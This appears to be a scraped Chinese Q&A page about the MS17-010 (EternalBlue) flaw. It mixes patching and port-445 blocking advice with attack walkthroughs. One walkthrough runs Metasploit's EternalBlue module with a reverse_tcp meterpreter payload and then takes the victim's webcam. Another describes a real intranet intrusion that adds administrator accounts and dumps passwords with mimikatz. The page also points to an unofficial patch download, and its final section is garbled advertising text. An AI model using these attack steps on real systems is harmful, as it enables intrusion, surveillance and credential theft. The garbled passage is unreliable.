⑴ win7的ms17-010補丁安裝不了,顯示這個
首先要停止windows update服務,但win10 在控制面板里是關不掉的,我們就要進入回組策略文件答,在運行里輸入gpedit.msc 進入。然後在計算機配置>管理模板>windows組件 >windows更新 >配置自動更新為禁用.
關閉後我們就要刪除臨時更新文件 進入c:\Windows\SoftwareDistribution (c是系統盤),刪除datastore 里所有的文件。如果想清楚已下載更新的話,就要清楚download 文件里的所有。
然後再在組策略里打開自動更新。 建議大家打開自動更新,自動更新會更新漏洞和驅動程序,我們安裝驅動也要用這個方式安裝為佳哦。
⑵ ms17010漏洞的簡單利用
(第一次在發表文章,沒啥經驗,分享一些學習經驗。大佬們多多包涵,也希望大家能夠指出我的錯誤。)
靶機:windows7 x64 IP:192.168.1.5
攻擊機:Kali Rolling (2019.3) x64 IP:192.168.1.3
兩台主機在同一網段內;win7關閉防火牆並且開啟445埠。
1、使用ipconfig/ifconfig分別查看win7和kali的ip。
2、打開msf工具
每次開啟都會有不同的界面
3、使用search命令搜索ms17_010
4、選擇模塊和設置條件
使用use來選擇第三個模塊,可以直接 use 2,也可以打全
然後用set來設置靶機IP set rhost 192.168.1.5
設置本機IP set lhost 192.168.1.3
設置監聽埠 set lport 8888 不設置則默認4444埠
設置payload set payload windows/x64/meterpreter/reverse_tcp
還有另外一個payload能用於本實驗,具體可以 show payloads 查看
最後,可以使用show options檢查所有信息
5、開始滲透 run
稍等片刻 看到win則成功創建會話
6、成功之後,可以開啟Windows7的攝像頭,截圖等等
具體可以用help查看
1、關閉445埠
2、打開防火牆,安裝安全軟體
3、安裝對應補丁,這里就不放鏈接了
關閉445埠的方法:
1)打開控制面板----Windows防火牆----高級設置
2)點擊新建規則,設置埠號的規則並且命名(如圖)
msf工具雖然強大,但只能用於已知的並且已提交模塊的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻擊。而不是簡單的使用工具use和set。
⑶ 請問大佬有微軟永恆之藍補丁ms17010補丁 V1.0軟體免費百度雲資源嗎
鏈接:
提取碼:4xqu
軟體名稱:微軟永恆之藍補丁ms17010補丁V1.0
語言:簡體中文
大小:143KB
類別:系統工具
介紹:微軟永恆之藍ms17010補丁下載,本補丁是微軟官方更新的針對修復永恆之藍病毒漏洞的最新補丁,其實這個補丁早在3月份就發布了,不過當時NSA的「永恆之藍」黑客武器也沒有泄露。
5月12日,一個根據永恆之藍黑客武器製造的蠕蟲勒索病毒肆虐了全球范圍內的多家機構、學校、企業的電腦,並要求用戶繳納一定數量比特幣不然就把電腦「撕票」。本站帶來微軟永恆之藍ms17010補丁官方下載,請大家盡快更新安裝以免遭病毒入侵。
⑷ 內網滲透之ms17-010
在內網滲透時,通常掛上代理後。在內網首先會打啵ms17-010。在實戰中,使用msf的ms17-010模塊,數次沒有反彈成功。基於此,到底如何成功利用ms17-010
在msf成功接收session之後,添加路由
然後使用ms17-010相關的模塊進行探測是否存在該漏洞。
嘗試利用
LHOST配置為公網IP
可以看到success。漏洞是可以利用的,但始終沒有session。不知道什麼原因。
參考資料: 利用公網Msf+MS17010跨網段攻擊內網
筆者在本地搭建環境,也是同樣的結果。嘗試更改payload為
bind_tcp攻擊者去連接,容易被防火牆和殺毒發現
可以成功生成session,但並不穩定,且在run的過程中非常容易導致本來的session died
在實際使用msf的ms17_010_eternalblue模塊時,筆者觀察到有幾個弊端。
1.session 很容易died
2.ms17_010_eternalblue模塊利用起來非常耗時
3.無法利用成功
有大佬推薦使用原始的fb.py。但配置起來感覺麻煩一些。
所以。筆者從i春秋上找到一個輕便的方程式漏洞利用工具。
參考資料: 萌新初試MS17-010方程式漏洞
工具使用起來很簡單。只需要msfvenom生成一個x64或x86的dll文件,替換該工具下的x64.dll或x86.dll 。再依次點擊Eternalblue、Doublepulsar 的Attack即可。在Attack的時候,調用x64.dll動態鏈接庫,反彈到公網IP。原理和fb.py一樣。
筆者通過ew代理進內網後,在跳板機上上傳了方程式漏洞利用工具、網安永恆之藍檢測工具。兩者結合,威力巨大。成功利用ms17-010
對於windows server 2008 ,msfvenom生成x64.dll文件
msf配置
將該x64.dll替換到方程式利用工具下面。
只需要更換目標的IP,就可以獲取session。
對於windows server 2003 ,msfvenom生成x86.dll文件
msf配置
進一步利用的一些命令
實際測試發現這種session非常穩定。不會輕易go die
實際測試server 2003的ms17-010時,有時候多次執行後msf就接收不到session,而且ms17-010利用時,脆弱的server 2003非常容易藍屏。
所以筆者選擇一種穩定可靠一些的辦法。
先通過ms17_010_commend模塊執行系統命令添加用戶至管理員。再指定SMBPass和SMBUser來建立windows可訪問命名管道[accessible named pipe]
參考資料 Metasploit 「永恆之藍」兩種模塊的利弊
system的許可權可以直接激活guest用戶添加管理員組。
注意:使用ms17_010_psexec需要指定管理員的用戶名、密碼,否則沒有session
同樣的操作,載入mimikatz,讀取管理員密碼。
⑸ WannaCry勒索病毒是什麼MS17-010漏斗如何利用
沒有被感染,預防防禦辦法(非常重要)
(1) 首要任務確定您的反病毒軟體更新到最新並可以查殺該勒索軟體。 Microsoft 反病毒產品病
毒庫版本 1.243.290.0 及以上可以查殺當前發現的這一變種。如您使用其他反病毒軟體,建議
與相應廠商確認。
(2) 確保終端用戶理解他們不應打開任何可疑的附件,即使他們看到一個熟悉的圖標( PDF 或
Office 文檔)。用戶不應在任何情況下執行附件中包含的可執行文件。如果有任何疑問,請用
戶聯系 IT 管理部門。
(3) 確保 MS17-010 在所有計算機上安裝,推薦安裝最新的 Microsoft 安全補丁,並將其他第
三方軟體更新到最新。
? 變通辦法
如暫時難以完成補丁安裝, 以下變通辦法在您遇到的情形中可能會有所幫助:
? 禁用 SMBv1
對於運行 Windows Vista 及更高版本的客戶
請參閱 Microsoft 知識庫文章 2696547
適用於運行 Windows 8.1 或 Windows Server 2012 R2 及更高版本的客戶的替代方法
對於客戶端操作系統:
1. 打開「控制面板」,單擊「程序」,然後單擊「打開或關閉 Windows 功能」。
2. 在「Windows 功能」窗口中,清除「SMB 1.0/CIFS 文件共享支持」復選框,然後單擊
「確定」以關閉此窗口。
3. 重啟系統。
⑹ 如何修復ms17-010漏洞,關閉445埠
關閉445埠後 是無法使用共享服務的
網路安全專家建議,用戶要斷網開機,即先拔掉網線再開機,這樣基本可以避免被勒索軟體感染。開機後應盡快想辦法打上安全補丁,或安裝各家網路安全公司針對此事推出的防禦工具,才可以聯網。建議盡快備份電腦中的重要文件資料到移動硬碟、U 盤,備份完後離線保存該磁碟,同時對於不明鏈接、文件和郵件要提高警惕,加強防範。
臨時解決方案:
1、開啟系統防火牆
2、利用系統防火牆高級設置阻止向445埠進行連接(該操作會影響使用445埠的服務)
3、打開系統自動更新,並檢測更新進行安裝
Win7、Win8、Win10的處理流程
1、打開控制面板-系統與安全-Windows防火牆,點擊左側啟動或關閉Windows防火牆。
2、選擇啟動防火牆,並點擊確定
3、點擊高級設置
4、點擊入站規則,新建規則
5、選擇埠,下一步
6、特定本地埠,輸入445,下一步
7、選擇阻止連接,下一步
8、配置文件,全選,下一步
9、名稱,可以任意輸入,完成即可。
XP系統的處理流程
1、依次打開控制面板,安全中心,Windows防火牆,選擇啟用
2、點擊開始,運行,輸入cmd,確定執行下面三條命令:net stop rdr 、net stop srv 、net stop netbt
⑺ 怎麼對系統ms17010 ms10061 ms14608,ms08067,ms09050補丁更新
試試騰訊電腦管家殺毒+管理2合1自修復漏洞:第間發現並修復系統存高內危漏洞打擾您情況自系容統打漏洞補丁輕輕鬆鬆病毒木馬拒門外自修復漏洞 電腦管家發現高危漏洞(僅包括高危漏洞包括其漏洞)第間自進行修復需用戶參與程度保證用戶電腦安全尤其適合、孩或計算機初級水平用戶使用